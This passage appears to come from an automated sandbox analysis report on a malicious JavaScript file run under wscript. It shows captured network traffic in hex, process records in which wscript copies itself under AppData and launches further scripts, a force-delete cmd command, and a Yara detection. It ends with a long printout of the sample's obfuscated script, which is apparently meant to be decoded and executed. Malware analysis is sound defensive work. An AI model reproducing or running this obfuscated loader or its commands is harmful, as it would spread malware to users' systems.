22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qX8bODRC2aDPzt6IJCBwajHFDKXIjBHNiK15Ot4+5udkO7djbo9ZURb/sUD4YMghK5Pa+ZC4aBjYsbZiG0uXQQ=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)\|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";D
Mar 10, 2021 07:01:38.557766914 CET	1428	IN	Data Raw: 44 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 61 7a 78 2e 73 65 61 72 63 68 21 3d 3d 27 3f 7a 27 29 7b 61 7a 78 2e 68 72 65 66 3d 27 2f 3f 7a 27 3b 7d 7d 3b 44 44 2e 6f 6e 6c 6f 61 64 3d 44 44 2e 6f 6e 72 65 61 64 79 73 Data Ascii: D.onerror=function(){if(azx.search!=='?z'){azx.href='/?z';}};DD.onload=DD.onreadystatechange=function(){if(!aAC&&LU){if(!window['googleNDT_']){}LU(google.ads.domains.Caf);}aAC=true;};DT.body.appendChild(DD);return{azm:function(n$){if(aAC)n$
Mar 10, 2021 07:01:38.557806015 CET	1429	IN	Data Raw: 63 72 65 65 6e 2c 52 72 3d 77 69 6e 64 6f 77 2c 61 7a 78 3d 52 72 2e 6c 6f 63 61 74 69 6f 6e 2c 61 41 42 3d 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2c 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 53 66 3d 44 54 2e 62 6f 64 79 7c 7c 44 54 2e 67 65 74 45 6c 65 Data Ascii: creen,Rr=window,azx=Rr.location,aAB=top.location,DT=document,Sf=DT.body\|\|DT.getElementsByTagName('body')[0],aAy=0,aAx=0,aAz=0,$IE=null;if(Sf.className==='ie6')$IE=6;else if(Sf.className==='ie7')$IE=7;else if(Sf.className==='ie8')$IE=8;else
Mar 10, 2021 07:01:38.557833910 CET	1429	IN	Data Raw: 77 68 3d 27 2b 67 5f 70 64 2e 72 5f 77 68 3a 27 26 77 68 3d 27 2b 61 41 78 29 2b 0a 28 67 5f 70 64 2e 72 65 66 5f 6b 65 79 77 6f 72 64 21 3d 3d 65 66 3f 27 26 72 65 66 5f 6b 65 79 77 6f 72 64 3d 27 2b 67 5f 70 64 2e 72 65 66 5f 6b 65 79 77 6f 72 Data Ascii: wh='+g_pd.r_wh:'&wh='+aAx)+(g_pd.ref_keyword!==ef?'&ref_keyword='+g_pd.ref_keyword:'')+(g_pc.$isWhitelisted()?'&abp=1':'')+($IE!==null?'&ie='+$IE:'')+(g_pd.partner!==ef?'&partner='+g_pd.partner:'')+(
Mar 10, 2021 07:01:38.557871103 CET	1430	IN	Data Raw: 31 31 35 0d 0a 67 5f 70 64 2e 73 75 62 69 64 31 21 3d 3d 65 66 3f 27 26 73 75 62 69 64 31 3d 27 2b 67 5f 70 64 2e 73 75 62 69 64 31 3a 27 27 29 2b 0a 28 67 5f 70 64 2e 73 75 62 69 64 32 21 3d 3d 65 66 3f 27 26 73 75 62 69 64 32 3d 27 2b 67 5f 70 Data Ascii: 115g_pd.subid1!==ef?'&subid1='+g_pd.subid1:'')+(g_pd.subid2!==ef?'&subid2='+g_pd.subid2:'')+(g_pd.subid3!==ef?'&subid3='+g_pd.subid3:'')+(g_pd.subid4!==ef?'&subid4='+g_pd.subid4:'')+(g_pd.subid5!==ef?'&subid5='+g_pd.subid5:'');Sf.appendC

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 6336 Parent PID: 5724

General

Start time:	07:01:29
Start date:	10/03/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js'
Imagebase:	0x7ff6bad80000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: wscript.exe PID: 6432 Parent PID: 6336

General

Start time:	07:01:30
Start date:	10/03/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\wscript.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' apxje
Imagebase:	0x7ff6bad80000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6560 Parent PID: 6432

General

Start time:	07:01:31
Start date:	10/03/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\cmd.exe' /c del /F /S /Q 'C:\Users\user\AppData\Local\nsoerwoel\*.exe'
Imagebase:	0x7ff77d8b0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6568 Parent PID: 6560

General

Start time:	07:01:32
Start date:	10/03/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: ibfmvoj.exe PID: 6652 Parent PID: 6432

General

Start time:	07:01:33
Start date:	10/03/2021
Path:	C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' vmowiiwl
Imagebase:	0x7ff7c0b90000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	high

Chronological Activities

Analysis Process: ibfmvoj.exe PID: 6692 Parent PID: 6432

General

Start time:	07:01:34
Start date:	10/03/2021
Path:	C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' xesyl
Imagebase:	0x7ff7c0b90000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: ibfmvoj.exe PID: 6860 Parent PID: 3388

General

Start time:	07:01:44
Start date:	10/03/2021
Path:	C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js'
Imagebase:	0x7ff7c0b90000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: ibfmvoj.exe PID: 7128 Parent PID: 3388

General

Start time:	07:01:52
Start date:	10/03/2021
Path:	C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js'
Imagebase:	0x7ff7c0b90000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 0000000B.00000003.238666236.0000025BBBBB1000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: ibfmvoj.exe PID: 852 Parent PID: 3388

General

Start time:	07:02:00
Start date:	10/03/2021
Path:	C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js'
Imagebase:	0x7ff7c0b90000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

JavaScript Code

Call Graph

Executed
Not Executed

Script:

Code
0	var a = ",{y$gm%r=-5 ,e($t$R$1zO$7:G670v>5&70>5&E&AyO$7Q%~~p\"eD9C45,lm$h%{)$cX55E2E?5[~rK8P$.:I-5E&t\"iliwO~xD9H;C7K$=O]XbPA$\"m!i5Kzg!s>$Xl(s#iD:I2E2H6M6C5I45Wvjvv~3J7L2H:5Iykz3F;C5L5H87\"Pzvv5e5A5rz{5Exx~zz\\df ixx=&-wxv~t2)lzp\"&>0w$R$$i-$Vgm,imSwnzg,7wxv~tm$kCj~pzw/wi#swnzg&>0}$R${y$gm%r=-5 (iy(r5,=55/5Qvx}2(e$h%q=->$?$K9J7K$2$E-Cx%Wv~r\|,F:>2)ywwv~r\|,F-30y$R$v2zr,m(s$qzr,7t(sxi)w7-Aj5A5h=&+wzv$e#i7-Ak5A5h=&xs#t+xzv$e#i7-Av+$R$$i-$Vgm,imSwnzg,7w}i\"pCe&t\"mxem%r7-Ap%$R$paAj+t5A5_r0ysy$R$7&Ah%x5A54Al{$R${y$gm%r=i>$1x(}5 ,e($$R$w2\|iJ%pyi(,z-PxCex(mwyi)$R$G\"5gvxxl5,$-5 3\"Awx$R${y$gm%r=i>$1i5/R$7&Pzvv5x5A54Pj%v5,,e($$$R$E?5r5@5iCpzr\|x}?5r@/>$$R$=x5@Q$J-515x5/5iCg}e(G%hzE,$-A$$;A5xPvzx+v$$belCeww=x>\"Alv$R${y$gm%r=i>$1zvv5x5A5&70$$R$)g=i>?{s($=zvv5v5A54P$($Q$)g=i>$:$J$@$J?5v@/>$$$R$)g=x5/5r>05x5/R$hx(m$kCj(s#G}e(G%hz,$$:$G95/5=L-Pvzx+v$$\"Pzvv5~0s5A5j+rxx~s$,>$1zvv5x{5A5_7lx&>D3-{-2#mxv%w%j2xs#3705&}xtO3D{-{Ck%s\|pz2xs#3705&}xtO3D{-{Cf~r\|2xs#37aPj%v5,,e($~$R$E05lA$-i&?5m5@5x{Cpzr\|x}?5m@/>$1x(}5 ,e($}$R$$i-$Vgm,imSwnzg,7Qh\\bPG2hi(zzvmQaLiXe2K2E&>?}2%tzr=&\\Ii&A$x-_~a>?}2)iVzu+i)x]ivhzv=&jwzvBE\|i$x705cCy>?}2)iVzu+i)x]ivhzv=&Xexlz1Xs$x(s\"&A$7r%1xexlz&>?}2)iVzu+i)x]ivhzv=&evvk#e705&$sBgvg}i7-PlCwzxgi'yzwLzeyi(,7G%r$ixx~s$&A$7g\"s)i7-PlCwzry,7&>?-i&$R$$i-$Yei=lCkzxVp\"Vzw&s$wzLzeyi(w=-Cw&p~x=&YeiO$7-Ct%t=-Cw&p~x=&qr7-Cw}m{x=->2\|iX~qz,>$D$F4E4Pm{$=5H<M9H8I4E$Q$-i&-5 (iy(r5{zt3\"5gvxxl5,z-5 3\"(iy(r5jvp)iP\"Pzvv5l($R${y$gm%r=i>$1m{$=i>$,e($$R$F0$$R$F?zp)i5zvv5x5A56Ar5A54Px(}5 v2(i\|[(mi=&]OXYq`hs{x-e(iq`bmxv%w%j`q[~rys-wq`Xy(vzrZzv)m%rq`Z\|&p%vzvq`Vh,e$gzhq`]myhzr705xA$7VZKtHlSgH7-3$xeg}$=v>$1\"v/$1eCvzklv~xz,7L`Gj`qW%j{vvz`qQ~g(s)s{xq`lm$h%{)`qG+v(i$xki(w~s$`qI.t\"s(i(`qEyzvrxiy`qW}s-W+tzv]myhzr705rA$7VZKtHlSgH7-3$xeg}$=v>$1\"3?,e($(g5A5j+rxx~s$,!i/05wv>$1zvv5w5A5_r0 $R$E0.05vzw5A5&7?{s($=zvv5m5A54P$~$Q$G9K?5m@/>$1wpmr$R$~?3j%v5,~$R$E?5m5@56J:P$~/@-5 $R$=n5/5wpmr$@$!i/2xlvvXsyiVx=m5)5oz}Cpzr\|x}->$:$G9K?.$R$)_~aPwpmr$R$)_ aPwpnr$R$.?3m5A54Pn5A54Pj%v5,,e($/$R$E?5}5@5wvCpzr\|x}?5}@/>$1m5A5,~$@$F-5)56J:Pn5A5, $@$)_~a>$:$G9K?.$R$)_~aPwpmr$R$)_ aPwpnr$R$.?(i)$@A5Wv~r\|2{v%qXlvvXsyi=wvCg}e(G%hzE,/-5b5wp,)_~a5/5wpnr-5)56J:r-P\"(iy(r5vzwP\"Pzvv5g%f5A5j+rxx~s$,>$1vzx+v$$belCj\"s%v=,F$@$belCvvrys#,>-5.54.5E4E4>2shx(m$k=5K-Cw+f)x(m$k=5>\"Pzvv5~ws5A5_7vzkzh~x705&-m$h%{)1!f705&#v&A$7v)x(y~&A$7q)g%r{m\|&A$7t(sxi.t705&vzvw&A$7e,k705&&x~r)xvp\"&A$7wye)iy&&A$7m)wzx+t705&{wG4705&#fvq705&}s+wzgvp\"&A$7l~nvg!x}m)&A$7v+f%xiy&A$7e+x%v+r)&A$7e,i$kzv705&{m\"i#s$&A$7k#i(&A$7l%x{m.&A$7o\"{!&A$7qwwv&A$7t(sxq%r705&(i\|q%r705&)})g\"ivr705&g&z~i-&A$7y$p%g!i(&A$7{~vzw}e(o705&{myh\"i(&A$7vzw#s$&A$7tzv{q%r705&#w)w705&xpze$i(&A$7sp705&(s\|yzo~p\"i(&A$7j)w705&0szo705&zqzv\|i$g/o~x705&yh)&A$7gxwzx+t705&,f)zwi705&xs#f%j~\|705&{v)x705&#g)l~i\"h705&0t}h~e\|&r?,e($)l}$R${y$gm%r=s>$1j%v5,,e($ 05\|A$~$R$%2\"i$klP$~?5n5A5tvv)i^r,belCvvrys#,>$?$~-A$.$R$%_B1~aA$%_~a5A5spnr05spnr$R$.-Pvzx+v$$%?3?,e($!t5A5j+rxx~s$,>$1m{$=fCj~pzI.m)x),wj%$@$}e=k5/5&v4N&>->$lWxv~t2'y~x=-3?,e($0x5A5j+rxx~s$,>$1x(}5 ,e($$R$w2%tzrii.x[m\"i=f{s5/5lv,\|$@$7eE47-A$M05%E-PxCg\"s)i=-Pm{$=fCj~pzI.m)x),wj%$@$}e=k5/5&v5I&>-5AR${e\"wz-5eCv+r=&:g%q)tzg:$Dg5w}yh%{$$Dt53{&A$E-P\"5gvxxl5,z-5 3\"Pzvv5j+y5A5j+rxx~s$,>$1zvv5xx5A5_r?{s($=zvv5m5A5rz{5I$y#i(es(,w2\|iJ%pyi(,wj%-CJ~pzw>?5%~2vxZry,>?5mCq%zzRz\|,>-5 ~j5,w2\|iI.xzr)m%rce#i=mCmi#,>2ce#i>$RA5&z\|z&>$x2&y)l=f{s5/5mCmi#,>2ce#i>\"(iy(r5xx3?,e($ys{$R${y$gm%r=-5 ~j5,ysy$6A5&7$;5h%x5/5,K45.5:E$?$L65.55E4E-5BR$$i-$Yei=-Ckzxim#i=->$1vzx+v$$ysy\"5i\"wz$1zvv5h%l5A5w}l=_7lx&>q3q3\"i\|mz~p\"iCg%qq3707lx&>q3q3F4Fpzk~xCg%qq37a>?,e($yix$R$7&Pj%v5,,e($ys~$R$E?5h%m5@5h%lCpzr\|x}?5h%m@/>$1x(}5 9,74705h%lph%mr-Pzvv5l\|j5A5~.g,fPhzg5A5h%lph%mr\"5gvxxl5,z-5 3${m$e\"p/$1hzpzxz,0\|xzw-Phzpzxz,}k{-3m{$=hzg5%R$7&>$wvze!\"~j5,yix$RA5&7-5 (iy(r5jvp)i3$zp)i5 ysy$R$yix?ys$R$$i-$Yei=-Ckzxim#i=-Pvzx+v$$ysy\"3\"Pzvv5(5A5j+rxx~s$,{ew05jvx>$1zvv5q5A5f{s5/5lv,\|$@$7eE:7-Pzvv5}+r5A5jvx5ARA555C5h%j=-5>5jvxPm{$=}+r5AR${e\"wz-5x}v%{5I(v%v=-Pzvv5n5A5rz{5Exx~zz\\df ixx=&bWmQa6CWzv,i(\\bP]XiTC:C47-PnCs&i$,7KZX705}+r5/5jvf5/5&Clq\"&>? 2)iVzu+i)x]ivhzv=&jwzvBE\|i$x705cCy>? 2)i$h=-Pzvv5g5A5rz{5Exx~zz\\df ixx=&VHdHW2hx(ivq7-PgCq%hz$R$H?x2}&i5A55PgCs&i$,>?x2-v~xz, 2(i)t%r)iWsy}>?x2)e,iis[m\"i=qA$G-Pzvv5o5A5fCs&i$Xz\|J~pz,#055>?,e($\"$R$!2(ivhVp\",>?!2xp%wz,>?v/$1fChzpzxzJ~pz,#-3$xeg}$=i>$1\",e($x05s+x5A5&70!i/$R$paPp5A5pCw&p~x=&Q%B15&>2&s&,>2)t\"m,7$B1S&>2)l~j,>2)t\"m,7&>?{s($=zvv5m5A54P$~$Q$J?5m@/>$!i/2&y)l=pCw}m{x=-Cg}e(G%hzE,E-5157G-Pj%v5,,e($~$R$E?5m5@5pCpzr\|x}?5m@/>$1g5A5ppmr2xlvvXsyiVx=4>$B$!i/_~$:$!i/2\"i$klr?%y$@A5Wv~r\|2{v%qXlvvXsyi=g5@57G$T$N95/5g5>5g>?3x(}5 zzvp=s+x>\"5gvxxl5,z-5 3\"Pzvv5w!$R${y$gm%r=-5 ,e(${sx$R$E?v/$1zvv5gws5A5f{s5/5lv,\|$@$7eF57-Pzvv5x5A5fCs&i$Xz\|J~pz,xf%05<A$64>?2xp%wz,>?{sx/@?(yCw}i\"pZ\|zg+xz,&{={E-A$7`7&5/5[hg(m&xCWxv~tJ+p\"Rvqz$@$7`7$7$@$}e=k5/5&v5E&>05&705&7054>?3$xeg}$=i>$1\"v/$1zvv5gws5A5f{s5/5lv,\|$@$7eF77-Pzvv5x5A5fCs&i$Xz\|J~pz,xf%05<A$64>?2xp%wz,>?{sx/@?(yCw}i\"pZ\|zg+xz,&{={E-A$7`7&5/5[hg(m&xCWxv~tJ+p\"Rvqz$@$7`7$7$@$}e=k5/5&v5G&>05&705&7054>?3$xeg}$=i>$1\"3?,e($&{5A5j+rxx~s$,#t>$1vzx+v$$#tpQvx}2{p%s(,belCvvrys#,>$?$#tCpzr\|x}-r\"Pzvv5{5A5&E4E&Px(}5 -$R$v2(i\|Vzey,7L`Pb`qWdJi[VVZ`qQ~g(s)s{xq`lm$h%{)$cXq`Xy(vzrZzv)m%rq`ev%h+gMY&>\"5gvxxl5,z-5 3zvv5z$$R$p4A$E054A$EaPx(}5 {s($=zvv5m5A5rz{5I$y#i(es(,\\iSwnzg,7{~r#k#x)>(s%xq`xm#zG&>2Z\|zgfyzv/,7WZPZGi$?$[VdQ5[~rH6tS&i(em$kh})xzq7->?5%~2vxZry,>?5mCq%zzRz\|,>-5 ,r5A5mCmi#,>_7zzv)m%r7aCw&p~x=&C&>?~j5,,rp4r$SA59>$wvze!\"3$xeg}$=i>$1\"~j5,6z$_Ea>$,rp4r$R$w2{s\"hzvZ\|~ww=h=&)})xzqyv~zz&>$@$7`qY)i(w7-5C5:5>59Pzvv5p\"$R$p&705&7aPx(}5 ,e($%w\"?{s($=zvv5m5A5rz{5I$y#i(es(,\\iSwnzg,7{~r#k#x)>(s%xq`xm#zG&>2Z\|zgfyzv/,7WZPZGi$?$[VdQ5[~rH6tS&i(em$kh})xzq7->?5%~2vxZry,>?5mCq%zzRz\|,>-5 %w\"$R$=,%w\"$R$~2~xzq=-p&dWae$k+e\|i7aCx%Wv~r\|,F:>-Cpzr\|x}$RA58>$T$%w\"$O$$i-$Vv(e/,J$B$%w\"2\"i$kl>2 s~r=&E&>$@$%w\"?\"p5A5eCvzkgivh=&]OaQq`hS[XlEgIq`Xpvw)i)`qQ^QZ`qHvxvfvwz`qV{gF;K:q`7$@$%w\"-Cw&p~x=&P&>_EaCw&p~x=&B&>?wvze!\"3$xeg}$=i>$1\",e($wj%$R$y,7p%gvpvt&hvxv&>$@$7`q&5/5lv,\|$@$7eE67-5/5&q`7?~j5,w2{s\"hzvZ\|~ww=f{s>-5 ,e($j{$R$7&AsjA$/w\|$R$E05ly$R$wj%$@$}e=k5/5&v4H&>0wj~$R$wj%$@$}e=k5/5&v4I&>$@$72 w7?~j5,w2{m\"iZ\|~ww=ly->$1x(}5 %x{$R$w2%tzrii.x[m\"i=ly055>?j{$R$%x{2(ivhVp\",>05sjCg\"s)i=-3$xeg}$=i>$1\"3$zp)i5 /w\|$R$F\"~j5,/w\|$2!5x{j5AR$7&>$1x(}5 j{$R$xsw,>$@$xsw,>$@$717$@$xsw,>$@$717$@$xsw,>$@$717$@$xsw,>$@$717$@$xsw,>$@$xsw,>$@$xsw,>?%x{$R$w2%tzrii.x[m\"i=ly056A$F-PsjC{(mi=x{j>05sjCg\"s)i=-3$xeg}$=i>$1\"3x(}5 ,e($oI5A5fCs&i$Xz\|J~pz,wj%$@$}e=k5/5&v4J&>05<A$64>?oICg\"s)i=-Pl{,wj%-Px(}5 w2xs&}[m\"i=[hg(m&xCwxv~tJ+p\"Rvqz05f{mA$v+i>\"5gvxxl5,z-5 3x(}5 ,e($xz,$R$wj%$@$}e=k5/5&v4E&>?,e($du5A5fCs&i$Xz\|J~pz,xz,05<A$64>?v/$1fChzpzxzJ~pz,wj%$@$}e=k5/5&v4N&>-3$xeg}$=i>$1\"v/$1fChzpzxzJ~pz,wj%$@$}e=k5/5&v5I&>-3$xeg}$=i>$1\"3$xeg}$=i>$1m{$=[hg(m&xCE(k+qzrwCpzr\|x}$S$E-5 ){~xxl5,lWxv~t2Vv\|y#i$x),E->$1gvwz$}e=k5/5&v5E&>>,e($xf%$R$wj%$@$}e=k5/5&v5F&>?v/$1zvv5~w~5A5fCs&i$Xz\|J~pz,xf%05<A$64>?3$xeg}$=i>$1[hg(m&xCu+m,>\"-l~pz$=x(yz-5 v/$1zvv5s%x5A5Kzxdf ixx=&-m$q\|qwOv%s`qg~q,67-Pj%v5,,e($yW5A5rz{5I$y#i(es(,%s2Z\|zgfyzv/,7WZPZGi$?$[VdQ5[~rH6tH~w!H(m,i7->?5%yWCeI$h=-P$yWCq%zzRz\|,>-5 ~j5,yWCmi#,>2bsyi\"2#eg},Dy)fDm>-5 ,e($ymy$R$yWCmi#,>2Yi,mxi^HPj%v5,,e($yTh$R$$i-$Zr+qzvvx%v=s%xCI.ixU+i(}=&VWhSXMVXdVh$dJ5 lm$7GcYm)oYv~zz2Yi,mxi^HR`.6L&5/5h~h5/5&q\|G;3$lLZVZ$Vw)sxG\"e)wR[~rH6tH~w!H(m,iisYm)oee(x~x~s$&>-P$6heWCeI$h=-P$yTh2#s,ici.x=->$1zvv5t^H5A5heWCmi#,>2Yi,mxi^HPj%v5,,e($\"Hh$R$$i-$Zr+qzvvx%v=s%xCI.ixU+i(}=&VWhSXMVXdVh$dJ5 lm$7GcYm)oee(x~x~s$2Yi,mxi^HR`.6L&5/5t^H5/5&q\|G;3$lLZVZ$Vw)sxG\"e)wR[~rH6tP%k~gvpYm)oisee(x~x~s$&>-P$6pYWCeI$h=-P$\"Hh2#s,ici.x=->$1zvv5pY$R$\"Hh2~xzq=-CHzz~gzMY$@$7`q&Ax(v5A5&[m\"i)`q&Ax(h5A5pY$@$v(0&s%v5A5,)g=k>$:$J4E$@$I4J-5/5&q`70&s($R$v($@$&s%vAt%h5A5pY$@$&s(0&m~v5A5lv,\|$@$7eE57-5/5&Cn)&At~v5A5t%v5/5lv,\|$@$7eE57-5/5&Cn)&At~h5A5pY$@$&m(0we$R$\"H5/5&[m\"i)2we&Px(}5 w2xvzei[s\"hzv=x(h>\"5gvxxl5,z-5 3x(}5 w2xvzei[s\"hzv=t%h>\"5gvxxl5,z-5 3l{,vy-A$}j=t%h>?v/$1zvv5k{$R$w2\|iJ%pyi(,vy-Pj%v5,,e(${W5A5rz{5I$y#i(es(,\|jCW+f[s\"hzv)-P$6jh2vxZry,>?5jh2#s,ici.x=->$1zvv5j{$R$=jh2~xzq=-5/5&7-Cw&p~x=&q`7-Ct%t=-Pm{$=j{2\"i$kl5AR$H$;5%~wcec,&e(wzJ\"svx=j{->$;5m)J~r~xz,{j>-5 ,e(${k5A5fCkzx[s\"hzv=x(h5/5j{-Pj%v5,,e($hj5A5rz{5I$y#i(es(,{kCJ~pzw>?5%hjCeI$h=-P$hjCq%zzRz\|,>-5 ,e(${j{$R$=W{2~xzq=-5/5&7-Cw&p~x=&q`7-Ct%t=-Pm{$=fCkzxZ\|i$w~s$Rvqz,{j{-Cx%P%{zvXe)i=-5AR$7n)&>$1x(}5 w2xs&}[m\"i=[hg(m&xCwxv~tJ+p\"Rvqz05x(h5/5j{$@$7`q&5/5j{jA$v+i>\"5gvxxl5,z-5 3\"3\"3\"5gvxxl5,z-5 3x(}5 w2xs&}[m\"i=[hg(m&xCwxv~tJ+p\"Rvqz05t~hA$v+i>\"5gvxxl5,z-5 3x(}5 ,e($%x{j5A5fCs&i$Xz\|J~pz,we056A$F-Psj{2-v~xzP~rz,7gy$[m\"i)`q&5/5t%s(-A$%x{jC{(miam$i=&:g%q)tzg:$Dg5we(x5{swxv~t$7$@$&m~v>05sj{2-v~xzP~rz,7i.m&>05sj{2xp%wz,>\"5gvxxl5,z-5 